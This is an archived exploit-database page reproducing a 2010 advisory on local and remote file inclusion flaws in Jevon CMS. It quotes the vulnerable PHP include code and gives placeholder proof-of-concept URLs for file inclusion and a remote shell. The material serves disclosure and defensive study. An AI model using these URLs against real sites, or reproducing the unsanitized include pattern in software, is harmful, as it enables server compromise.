Lucene search
K

Jevon CMS Local File Inclusion / Remote File Inclusion

🗓️ 06 Apr 2010 00:00:00Reported by eidelweissType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

jevoncms (LFI/RFI) Multiple Vulnerabilities in main templat

Code
`########################################################  
jevoncms (LFI/RFI) Multiple Vulnerabilities  
########################################################  
  
[+]Title : jevoncms (libdir) Multiple Vulnerability  
[+]Version: -  
[+]Download: http://sourceforge.net/projects/jevoncms/files/  
[+]Author: eidelweiss  
[+]Contact: eidelweiss[at]cyberservices[dot]com   
  
[!]Thank`s To: all friends  
  
########################################################  
  
-=[ Vuln C0de ]=-  
***************************  
[-] jevoncms/php/main/jevoncms.php  
  
$_PHPLIB["libdir"] = "phplib/";   
require($_PHPLIB["libdir"] ."template.inc"); /* Disable this, if you are not using templates. */  
require("template/jvc_template.php");  
require("php/main/database/jvc_Database.php");  
  
***************************  
[-] jevoncms/php/main/template/jvc_template.php  
  
if($type!=$lasttype && $type!=''){  
$path= "php/".$type."/".$type.".php" ;  
// echo $path;  
require($path);  
  
***************************  
[-] jevoncms/php/menu/menu.php  
  
//require($_PHPLIB["libdir"] ."template.inc"); /* Disable this, if you are not using templates. */  
  
***************************  
  
-=[ Proof Of Concept ]=-  
  
  
http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]  
  
http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path= [rfi shell]  
  
http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]  
  
######################=[E0F]=#############################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2010 00:00Current
7.4High risk
Vulners AI Score7.4
16